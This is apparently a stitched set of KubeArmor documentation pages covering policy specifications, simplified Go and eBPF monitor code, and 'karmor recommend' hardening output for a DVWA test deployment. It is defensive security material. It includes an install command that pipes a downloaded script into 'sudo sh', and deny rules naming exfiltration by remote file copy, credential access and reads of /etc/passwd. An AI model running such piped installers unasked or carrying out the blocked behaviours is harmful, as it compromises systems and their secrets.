controller - Deployments for installing KubeArmorController alongwith cert-manager
CRD - KubeArmorPollicy and KubeArmorHostPolicy CRDs
get - Stores source code for deploygen, a tool used for specifying kubearmor deployments
helm/
KubeArmor - KubeArmor's Helm chart
KubeArmorOperator - KubeArmorOperator's Helm chart
examples/ - Example microservices for testing
tests/ - Automated test framework for KubeArmor
# simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: block-sensitive-file-read
namespace: default
spec:
selector:
matchLabels:
app: sensitive-data # Policy applies to containers/pods with this label
file:
matchPaths:
- path: /sensitive/config # Specific file to protect
readOnly: true # Protect against writes too, but let's focus on read
action: Block # If read is attempted, block it
// KubeArmor/core/k8sHandler.go (Simplified)
// WatchK8sPods Function
func (kh *K8sHandler) WatchK8sPods(nodeName string) *http.Response {
// ... code to build API request URL ...
// The URL includes '?watch=true' to get a stream of events
URL := "https://" + kh.K8sHost + ":" + kh.K8sPort + "/api/v1/pods?watch=true"
// ... code to make HTTP request to K8s API server ...
// Returns a response stream where KubeArmor reads events
resp, err := kh.WatchClient.Do(req)
if err != nil {
return nil // Handle error
}
return resp
}
// ... similar functions exist to watch Nodes and Policies ...
// KubeArmor/core/dockerHandler.go (Simplified)
// GetContainerInfo Function
func (dh *DockerHandler) GetContainerInfo(containerID string, OwnerInfo map[string]tp.PodOwner) (tp.Container, error) {
if dh.DockerClient == nil {
return tp.Container{}, errors.New("no docker client")
}
// Ask the Docker daemon for details about a specific container ID
inspect, err := dh.DockerClient.ContainerInspect(context.Background(), containerID)
if err != nil {
return tp.Container{}, err // Handle error
}
container := tp.Container{}
container.ContainerID = inspect.ID
container.ContainerName = strings.TrimLeft(inspect.Name, "/")
// Get Kubernetes specific labels if available (e.g., for Pod name, namespace)
containerLabels := inspect.Config.Labels
if val, ok := containerLabels["io.kubernetes.pod.namespace"]; ok {
container.NamespaceName = val
}
if val, ok := containerLabels["io.kubernetes.pod.name"]; ok {
container.EndPointName = val // In KubeArmor types, EndPoint often refers to a Pod or standalone Container
}
// ... get other details like image, apparmor profile, privileged status ...
// Get the *host* PID of the container's main process
pid := strconv.Itoa(inspect.State.Pid)
// Read /proc/<host-pid>/ns/pid and /proc/<host-pid>/ns/mnt to get Namespace IDs
if data, err := os.Readlink(filepath.Join(cfg.GlobalCfg.ProcFsMount, pid, "/ns/pid")); err == nil {
fmt.Sscanf(data, "pid:[%d]\n", &container.PidNS)
}
if data, err := os.Readlink(filepath.Join(cfg.GlobalCfg.ProcFsMount, pid, "/ns/mnt")); err == nil {
fmt.Sscanf(data, "mnt:[%d]\n", &container.MntNS)
}
// ... store labels, etc. ...
return container, nil
}
// KubeArmor/monitor/processTree.go (Simplified)
// NsKey Structure (used as map key)
type NsKey struct {
PidNS uint32
MntNS uint32
}
// LookupContainerID Function
// This function is used when an event comes in with PidNS and MntNS
func (mon *SystemMonitor) LookupContainerID(pidns, mntns uint32) string {
key := NsKey{PidNS: pidns, MntNS: mntns}
mon.NsMapLock.RLock() // Use read lock for looking up
defer mon.NsMapLock.RUnlock()
if val, ok := mon.NsMap[key]; ok {
// If the key (Namespace IDs) is in the map, return the ContainerID
return val
}
// Return empty string if not found (might be a host process)
return ""
}
// AddContainerIDToNsMap Function
// This function is called when KubeArmor discovers a new container
func (mon *SystemMonitor) AddContainerIDToNsMap(containerID string, namespace string, pidns, mntns uint32) {
key := NsKey{PidNS: pidns, MntNS: mntns}
mon.NsMapLock.Lock() // Use write lock for modifying the map
defer mon.NsMapLock.Unlock()
// Store the mapping: Namespace IDs -> Container ID
mon.NsMap[key] = containerID
// ... also updates other maps related to namespaces and policies ...
}
Container
Container ID, PID Namespace ID, Mount Namespace ID, Pod Name, Namespace, Labels
Kubernetes API, Container Runtime
Node
Node Name, Node Labels, Operating System Info
Kubernetes API, Host OS APIs
KubeArmor is a security solution for the Kubernetes and cloud native platforms that helps protect your workloads from attacks and threats. It does this by providing a set of hardening policies that are based on industry-leading compliance and attack frameworks such as CIS, MITRE, NIST-800-53, and STIGs. These policies are designed to help you secure your workloads in a way that is compliant with these frameworks and recommended best practices.
One of the key features of KubeArmor is that it provides these hardening policies out-of-the-box, meaning that you don't have to spend time researching and configuring them yourself. Instead, you can simply apply the policies to your workloads and immediately start benefiting from the added security that they provide.
Additionally, KubeArmor presents these hardening policies in the context of your workload, so you can see how they will be applied and what impact they will have on your system. This allows you to make informed decisions about which policies to apply, and helps you understand the trade-offs between security and functionality.
Overall, KubeArmor is a powerful tool for securing your Kubernetes workloads, and its out-of-the-box hardening policies based on industry-leading compliance and attack frameworks make it easy to get started and ensure that your system is as secure as possible.
Hardening policies are derived from industry leading compliance standards and attack frameworks such as CIS, MITRE, NIST, STIGs, and several others.KubeArmor Policy Templates contains the latest hardening policies.
KubeArmor client tool (karmor) provides a way (karmor recommend
) to fetch the policies in the context of the kubernetes workloads or specific container using command line.
The output is a set of KubeArmorPolicy
or KubeArmorHostPolicy
that can be applied using k8s native tools (such as kubectl apply
).
The rules in hardening policies are based on inputs from:
Several others...
Pre-requisites:
Install KubeArmor
curl -sfL http://get.kubearmor.io/ | sudo sh -s -- -b /usr/local/bin && karmor install
Get the hardening policies in context of all the deployment in namespace NAMESPACE:
karmor recommend -n NAMESPACE
The recommended policies would be available in the out
folder.
❯ karmor recommend -n dvwa
INFO[0000] pulling image image="cytopia/dvwa:php-8.1"
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-maintenance-tool-access.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-cert-access.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-owner-discovery.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-deny-write-under-bin-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-write-under-dev-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-detect-access-to-cronjob-files.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-least-functionality-execute-package-management-process-in-container.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-remote-file-copy.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-in-shm-folder.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-under-etc-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-under-etc-directory.yaml ...
INFO[0000] pulling image image="mariadb:10.1"
created policy out/dvwa-dvwa-mysql/mariadb-10-1-maintenance-tool-access.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-cert-access.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-owner-discovery.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-deny-write-under-bin-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-write-under-dev-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-detect-access-to-cronjob-files.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-least-functionality-execute-package-management-process-in-container.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-remote-file-copy.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-in-shm-folder.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-under-etc-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-under-etc-directory.yaml ...
output report in out/report.txt ...
Deployment | dvwa/dvwa-web
Container | cytopia/dvwa:php-8.1
OS | linux
Arch |
Distro |
Output Directory | out/dvwa-dvwa-web
policy-template version | v0.1.6
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| POLICY | SHORT DESC | SEVERITY | ACTION | TAGS |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-maintenance- | Restrict access to maintenance | 1 | Block | PCI_DSS |
| tool-access.yaml | tools (apk, mii-tool, ...) | | | MITRE |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-cert- | Restrict access to trusted | 1 | Block | MITRE |
| access.yaml | certificated bundles in the OS | | | MITRE_T1552_unsecured_credentials |
| | image | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system-owner- | System Information Discovery | 3 | Block | MITRE |
| discovery.yaml | - block system owner discovery | | | MITRE_T1082_system_information_discovery |
| | commands | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system- | System and Information | 5 | Block | NIST NIST_800-53_AU-2 |
| monitoring-deny-write-under-bin- | Integrity - System Monitoring | | | NIST_800-53_SI-4 MITRE |
| directory.yaml | make directory under /bin/ | | | MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system- | System and Information | 5 | Audit | NIST NIST_800-53_AU-2 |
| monitoring-write-under-dev- | Integrity - System Monitoring | | | NIST_800-53_SI-4 MITRE |
| directory.yaml | make files under /dev/ | | | MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system- | System and Information | 5 | Audit | NIST SI-4 |
| monitoring-detect-access-to- | Integrity - System Monitoring | | | NIST_800-53_SI-4 |
| cronjob-files.yaml | Detect access to cronjob files | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-least- | System and Information | 5 | Block | NIST |
| functionality-execute-package- | Integrity - Least | | | NIST_800-53_CM-7(4) |
| management-process-in- | Functionality deny execution | | | SI-4 process |
| container.yaml | of package manager process in | | | NIST_800-53_SI-4 |
| | container | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-remote- | The adversary is trying to | 5 | Block | MITRE |
| file-copy.yaml | steal data. | | | MITRE_TA0008_lateral_movement |
| | | | | MITRE_TA0010_exfiltration |
| | | | | MITRE_TA0006_credential_access |
| | | | | MITRE_T1552_unsecured_credentials |
| | | | | NIST_800-53_SI-4(18) NIST |
| | | | | NIST_800-53 NIST_800-53_SC-4 |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write-in- | The adversary is trying to | 5 | Block | MITRE_execution |
| shm-folder.yaml | write under shm folder | | | MITRE |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write- | The adversary is trying to | 5 | Block | NIST_800-53_SI-7 NIST |
| under-etc-directory.yaml | avoid being detected. | | | NIST_800-53_SI-4 NIST_800-53 |
| | | | | MITRE_T1562.001_disable_or_modify_tools |
| | | | | MITRE_T1036.005_match_legitimate_name_or_location |
| | | | | MITRE_TA0003_persistence |
| | | | | MITRE MITRE_T1036_masquerading |
| | | | | MITRE_TA0005_defense_evasion |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write- | Adversaries may delete or | 5 | Block | NIST NIST_800-53 NIST_800-53_CM-5 |
| under-etc-directory.yaml | modify artifacts generated | | | NIST_800-53_AU-6(8) |
| | within systems to remove | | | MITRE_T1070_indicator_removal_on_host |
| | evidence. | | | MITRE MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
Deployment | dvwa/dvwa-mysql
Container | mariadb:10.1
OS | linux
Arch |
Distro |
Output Directory | out/dvwa-dvwa-mysql
policy-template version | v0.1.6
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| POLICY | SHORT DESC | SEVERITY | ACTION | TAGS |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-maintenance-tool- | Restrict access to maintenance | 1 | Block | PCI_DSS |
| access.yaml | tools (apk, mii-tool, ...) | | | MITRE |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-cert-access.yaml | Restrict access to trusted | 1 | Block | MITRE |
| | certificated bundles in the OS | | | MITRE_T1552_unsecured_credentials |
| | image | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-owner- | System Information Discovery | 3 | Block | MITRE |
| discovery.yaml | - block system owner discovery | | | MITRE_T1082_system_information_discovery |
| | commands | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring- | System and Information | 5 | Block | NIST NIST_800-53_AU-2 |
| deny-write-under-bin-directory.yaml | Integrity - System Monitoring | | | NIST_800-53_SI-4 MITRE |
| | make directory under /bin/ | | | MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring- | System and Information | 5 | Audit | NIST NIST_800-53_AU-2 |
| write-under-dev-directory.yaml | Integrity - System Monitoring | | | NIST_800-53_SI-4 MITRE |
| | make files under /dev/ | | | MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring- | System and Information | 5 | Audit | NIST SI-4 |
| detect-access-to-cronjob-files.yaml | Integrity - System Monitoring | | | NIST_800-53_SI-4 |
| | Detect access to cronjob files | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-least-functionality- | System and Information | 5 | Block | NIST |
| execute-package-management-process- | Integrity - Least | | | NIST_800-53_CM-7(4) |
| in-container.yaml | Functionality deny execution | | | SI-4 process |
| | of package manager process in | | | NIST_800-53_SI-4 |
| | container | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-remote-file- | The adversary is trying to | 5 | Block | MITRE |
| copy.yaml | steal data. | | | MITRE_TA0008_lateral_movement |
| | | | | MITRE_TA0010_exfiltration |
| | | | | MITRE_TA0006_credential_access |
| | | | | MITRE_T1552_unsecured_credentials |
| | | | | NIST_800-53_SI-4(18) NIST |
| | | | | NIST_800-53 NIST_800-53_SC-4 |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-in-shm- | The adversary is trying to | 5 | Block | MITRE_execution |
| folder.yaml | write under shm folder | | | MITRE |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-under-etc- | The adversary is trying to | 5 | Block | NIST_800-53_SI-7 NIST |
| directory.yaml | avoid being detected. | | | NIST_800-53_SI-4 NIST_800-53 |
| | | | | MITRE_T1562.001_disable_or_modify_tools |
| | | | | MITRE_T1036.005_match_legitimate_name_or_location |
| | | | | MITRE_TA0003_persistence |
| | | | | MITRE MITRE_T1036_masquerading |
| | | | | MITRE_TA0005_defense_evasion |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-under-etc- | Adversaries may delete or | 5 | Block | NIST NIST_800-53 NIST_800-53_CM-5 |
| directory.yaml | modify artifacts generated | | | NIST_800-53_AU-6(8) |
| | within systems to remove | | | MITRE_T1070_indicator_removal_on_host |
| | evidence. | | | MITRE MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
Key highlights:
The hardening policies are available by default in the out
folder separated out in directories based on deployment names.
Get an HTML report by using the option --report report.html
with karmor recommend
.
Get hardening policies in context to specific compliance by specifying --tag <CIS/MITRE/...>
option.
Welcome back to the KubeArmor tutorial! In the previous chapters, we've built up our understanding of how KubeArmor defines security rules using Security Policies, how it figures out who is performing actions using Container/Node Identity, and how it configures the underlying OS to actively enforce those rules using the Runtime Enforcer.
But even with policies and enforcement set up, KubeArmor needs to constantly know what's happening inside your system. When a process starts, a file is accessed, or a network connection is attempted, KubeArmor needs to be aware of these events to either enforce a policy (via the Runtime Enforcer) or simply record the activity for auditing and visibility.
This is where the System Monitor comes in.
Think of the System Monitor as KubeArmor's eyes and ears inside the operating system on each node. While the Runtime Enforcer acts as the security guard making decisions based on loaded rules, the System Monitor is the surveillance system and log recorder that detects all the relevant activity.
Its main job is to:
Observe: Watch for specific actions happening deep within the Linux kernel, like:
Processes starting or ending.
Files being opened, read, or written.
Network connections being made or accepted.
Changes to system privileges (capabilities).
Collect Data: Gather detailed information about these events (which process, what file path, what network address, etc.).
Add Context: Crucially, it correlates the low-level event data with the higher-level Container/Node Identity information KubeArmor maintains (like which container, pod, or node the event originated from).
Prepare for Logging and Processing: Format this enriched event data so it can be sent for logging (via the Log Feeder) or used by other KubeArmor components.
The System Monitor uses advanced kernel technology, primarily eBPF, to achieve this low-overhead, deep visibility into system activities without requiring modifications to the applications or the kernel itself.
Let's revisit our web server example. We have a policy to Block the web server container (app: my-web-app
) from reading /etc/passwd
.
You apply the Security Policy.
KubeArmor's Runtime Enforcer translates this policy and loads a rule into the kernel's security module (say, BPF-LSM).
An attacker compromises your web server and tries to read /etc/passwd
.
The OS kernel intercepts this attempt (via the BPF-LSM hook configured by the Runtime Enforcer).
Based on the loaded rule, the Runtime Enforcer's BPF program blocks the action.
So, the enforcement worked! The read was prevented. But how do you know this happened? How do you know someone tried to access /etc/passwd
?
This is where the System Monitor is essential. Even when an action is blocked by the Runtime Enforcer, the System Monitor is still observing that activity.
When the web server attempts to read /etc/passwd
:
The System Monitor's eBPF programs, also attached to kernel hooks, detect the file access attempt.
It collects data: the process ID, the file path (/etc/passwd
), the type of access (read).
It adds context: it uses the process ID and Namespace IDs to look up in KubeArmor's internal map and identifies that this process belongs to the container with label app: my-web-app
.
It also sees that the Runtime Enforcer returned an error code indicating the action was blocked.
The System Monitor bundles all this information (who, what, where, when, and the outcome - Blocked) and sends it to KubeArmor for logging.
Without the System Monitor, you would just have a failed system call ("Permission denied") from the application's perspective, but you wouldn't have the centralized, context-rich security alert generated by KubeArmor that tells you which container specifically tried to read /etc/passwd
and that it was blocked by policy.
The System Monitor provides the crucial visibility layer, even for actions that are successfully prevented by enforcement. It also provides visibility for actions that are simply Audited by policy, or even for actions that are Allowed but that you want to monitor.
The System Monitor relies heavily on eBPF programs loaded into the Linux kernel. Here's a simplified flow:
Initialization: When the KubeArmor Daemon starts on a node, its System Monitor component loads various eBPF programs into the kernel.
Hooking: These eBPF programs attach to specific points (called "hooks") within the kernel where system events occur (e.g., just before a file open is processed, or when a new process is created).
Event Detection: When a user application or system process performs an action (like open("/etc/passwd")
), the kernel reaches the attached eBPF hook.
Data Collection (in Kernel): The eBPF program at the hook executes. It can access information about the event directly from the kernel's memory (like the process structure, file path, network socket details). It also gets the process's Namespace IDs Container/Node Identity.
Event Reporting (Kernel to User Space): The eBPF program packages the collected data (raw event + Namespace IDs) into a structure and sends it to the KubeArmor Daemon in user space using a highly efficient kernel mechanism, typically an eBPF ring buffer.
Data Reception (in KubeArmor Daemon): The System Monitor component in the KubeArmor Daemon continuously reads from this ring buffer.
Context Enrichment: For each incoming event, the System Monitor uses the Namespace IDs provided by the eBPF program to look up the corresponding Container ID, Pod Name, Namespace, and Labels in its internal identity map (the one built by the Container/Node Identity component). It also adds other relevant details like the process's current working directory and parent process.
Log/Alert Generation: The System Monitor formats all this enriched information into a structured log or alert message.
Forwarding: The formatted log is then sent to the Log Feeder component, which is responsible for sending it to your configured logging or alerting systems.
Here's a simple sequence diagram illustrating this:
This diagram shows how the eBPF programs in the kernel are the first point of contact for system events, collecting the initial data before sending it up to the KubeArmor Daemon for further processing, context addition, and logging.
Let's look at tiny snippets from the KubeArmor source code to see hints of how this works.
The eBPF programs (written in C, compiled to BPF bytecode) define the structure of the event data they send to user space. In KubeArmor/BPF/shared.h
, you can find structures like event
:
This shows the event
structure containing key fields like timestamps, Namespace IDs (pid_id
, mnt_id
), the type of event (event_id
), the syscall result (retval
), the command name, and potentially file paths (data
). It also defines the kubearmor_events
map as a BPF_MAP_TYPE_RINGBUF
, which is the mechanism used by eBPF programs in the kernel to efficiently send these event
structures to the KubeArmor Daemon in user space.
On the KubeArmor Daemon side (in Go), the System Monitor component (KubeArmor/monitor/systemMonitor.go
) reads from this ring buffer and processes the events.
This Go code shows:
The SyscallPerfMap
reading from the eBPF ring buffer in the kernel.
Raw event data being sent to the SyscallChannel
.
A loop reading from SyscallChannel
, parsing the raw bytes into a SyscallContext
struct.
Using ctx.PidID
and ctx.MntID
(Namespace IDs) to call LookupContainerID
and get the containerID
.
Packaging the raw context (ContextSys
), parsed arguments (ContextArgs
), and the looked-up ContainerID
into a ContextCombined
struct.
Sending the enriched ContextCombined
event to the ContextChan
.
This ContextCombined
structure is the output of the System Monitor – it's the rich event data with identity context ready for the Log Feeder and other components.
The System Monitor uses different eBPF programs attached to various kernel hooks to monitor different types of activities:
The specific hooks used might vary slightly depending on the kernel version and the chosen Runtime Enforcerconfiguration (AppArmor/SELinux use different integration points than pure BPF-LSM), but the goal is the same: intercept and report relevant system calls and kernel security hooks.
The System Monitor acts as a fundamental data source:
It provides the event data that the Runtime Enforcer's BPF programs might check against loaded policies in the kernel (BPF-LSM case). Note that enforcement happens at the hook via the rules loaded by the Enforcer, but the Monitor still observes the event and its outcome.
It uses the mappings maintained by the Container/Node Identity component to add context to raw events.
It prepares and forwards structured event logs to the Log Feeder.
Essentially, the Monitor is the "observer" part of KubeArmor's runtime security. It sees everything, correlates it to your workloads, and reports it, enabling both enforcement (via the Enforcer's rules acting on these observed events) and visibility.
In this chapter, you learned that the KubeArmor System Monitor is the component responsible for observing system events happening within the kernel. Using eBPF technology, it detects file access, process execution, network activity, and other critical operations. It enriches this raw data with Container/Node Identity context and prepares it for logging and analysis, providing essential visibility into your system's runtime behavior, regardless of whether an action was allowed, audited, or blocked by policy.
Understanding the System Monitor and its reliance on eBPF is key to appreciating KubeArmor's low-overhead, high-fidelity approach to runtime security. In the next chapter, we'll take a deeper dive into the technology that powers this monitoring (and the BPF-LSM enforcer)
Here is the specification of a host security policy.
Note Please note that for system calls monitoring we only support audit action no matter what the value of action is
For better understanding, you can check .
Now, we will briefly explain how to define a host security policy.
Common
A security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion and kind would be the same in any security policies. In the case of metadata, you need to specify the name of a policy.
Make sure that you need to use KubeArmorHostPolicy
, not KubeArmorPolicy
.
Severity
You can specify the severity of a given policy from 1 to 10. This severity will appear in alerts when policy violations happen.
Tags
The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.
Message
The message part is optional. You can add an alert message, and then the message will be presented in alert logs.
NodeSelector
The node selector part is relatively straightforward. Similar to other Kubernetes configurations, you can specify (a group of) nodes based on labels.
If you do not have any custom labels, you can use system labels as well.
Process
In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to determine particular patterns for executables by using regular expressions. However, we generally do not recommend using this match.
In each match, there are three options.
ownerOnly (static action: allow owner only; otherwise block all)
If this is enabled, the owners of the executable(s) defined with matchPaths and matchDirectories will be only allowed to execute.
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.
fromSource
If a path is specified in fromSource, the executable at the path will be allowed/blocked to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be only allowed (blocked) to execute /bin/sleep. Otherwise, the execution of /bin/sleep will be blocked (allowed).
File
The file section is quite similar to the process section.
The only difference between 'process' and 'file' is the readOnly option.
readOnly (static action: allow to read only; otherwise block all)
If this is enabled, the read operation will be only allowed, and any other operations (e.g., write) will be blocked.
Network
In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.
Capabilities
In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in .
Syscalls
In the case of syscalls, there are two types of matches, matchSyscalls and matchPaths. matchPaths can be used to target system calls targeting specific binary path or anything under a specific directory, additionally you can slice based on syscalls generated by a binary or a group of binaries in a directory. You can use matchSyscall as a more general rule to match syscalls from all sources or from specific binaries.
There is one options in each match.
fromSource
If a path is specified in fromSource, kubearmor will match only syscalls generated by the defined source. For better undrestanding, lets take the example below. Only unlink system calls generated by /bin/bash
will be matched.
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory.
Action
The action could be Audit or Block in general. In order to use the Allow action, you should define 'fromSource'; otherwise, all Allow actions will be ignored by default.
If 'fromSource' is defined, we can use all actions for specific rules.
For System calls monitoring, we only support audit mode no matter what the action is set to.
apiVersion: security.kubearmor.com/v1
kind:KubeArmorHostPolicy
metadata:
name: [policy name]
spec:
severity: [1-10] # --> optional
tags: ["tag", ...] # --> optional
message: [message] # --> optional
nodeSelector:
matchLabels:
[key1]: [value1]
[keyN]: [valueN]
process:
matchPaths:
- path: [absolute executable path]
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchPatterns:
- pattern: [regex pattern]
ownerOnly: [true|false] # --> optional
file:
matchPaths:
- path: [absolute file path]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchPatterns:
- pattern: [regex pattern]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
network:
matchProtocols:
- protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
fromSource:
- path: [absolute exectuable path]
capabilities:
matchCapabilities:
- capability: [capability name]
fromSource:
- path: [absolute exectuable path]
action: [Audit|Block] (Block by default)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
name: [policy name]
severity: [1-10]
tags: ["tag1", ..., "tagN"]
message: [message]
nodeSelector:
matchLabels:
[key1]: [value1]
[keyN]: [valueN]
kubernetes.io/arch: [architecture, (e.g., amd64)]
kubernetes.io/hostname: [host name, (e.g., kubearmor-dev)]
kubernetes.io/os: [operating system, (e.g., linux)]
process:
matchPaths:
- path: [absolute executable path]
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchPatterns:
- pattern: [regex pattern]
ownerOnly: [true|false] # --> optional
process:
matchPaths:
- path: /bin/sleep
fromSource:
- path: /bin/bash
file:
matchPaths:
- path: [absolute file path]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute file path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute file path]
matchPatterns:
- pattern: [regex pattern]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
network:
matchProtocols:
- protocol: [protocol(,)] # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
fromSource:
- path: [absolute file path]
capabilities:
matchCapabilities:
- capability: [capability name(,)]
fromSource:
- path: [absolute file path]
syscalls:
matchSyscalls:
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute exectuable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
matchPaths:
- path: [absolute directory path | absolute exectuable path]
recursive: [true|false] # --> optional
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute exectuable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
process:
matchPaths:
- path: /bin/sleep
- syscall:
- unlink
fromSource:
- path: /bin/bash
action: [Audit|Block]
action: [Allow|Audit|Block]
// KubeArmor/BPF/shared.h (Simplified)
typedef struct {
u64 ts; // Timestamp
u32 pid_id; // PID Namespace ID
u32 mnt_id; // Mount Namespace ID
// ... other process IDs (host/container) and UID ...
u32 event_id; // Identifier for the type of event (e.g., file open, process exec)
s64 retval; // Return value of the syscall (useful for blocked actions)
u8 comm[TASK_COMM_LEN]; // Process command name
bufs_k data; // Structure potentially holding file path, source process path
u64 exec_id; // Identifier for exec events
} event;
struct {
__uint(type, BPF_MAP_TYPE_RINGBUF); // The type of map used for kernel-to-userspace communication
__uint(max_entries, 1 << 24);
__uint(pinning, LIBBPF_PIN_BY_NAME);
} kubearmor_events SEC(".maps"); // This is the ring buffer map
// KubeArmor/monitor/systemMonitor.go (Simplified)
// SystemMonitor Structure (partially shown)
type SystemMonitor struct {
// ... other fields ...
// system events
SyscallChannel chan []byte // Channel to receive raw event data
SyscallPerfMap *perf.Reader // Reads from the eBPF ring buffer
// PidID + MntID -> container id map (from Container/Node Identity)
NsMap map[NsKey]string
NsMapLock *sync.RWMutex
// context + args
ContextChan chan ContextCombined // Channel to send processed events
// ... other fields ...
}
// TraceSyscall Function (Simplified)
func (mon *SystemMonitor) TraceSyscall() {
if mon.SyscallPerfMap != nil {
// Goroutine to read from the perf buffer (ring buffer)
go func() {
for {
record, err := mon.SyscallPerfMap.Read() // Read raw event data from the ring buffer
if err != nil {
// ... error handling ...
return
}
// Send raw data to the processing channel
mon.SyscallChannel <- record.RawSample
}
}()
} else {
// ... log error ...
return
}
// Goroutine to process events from the channel
for {
select {
case <-StopChan:
return // Exit when told to stop
case dataRaw, valid := <-mon.SyscallChannel: // Receive raw event data
if !valid {
continue
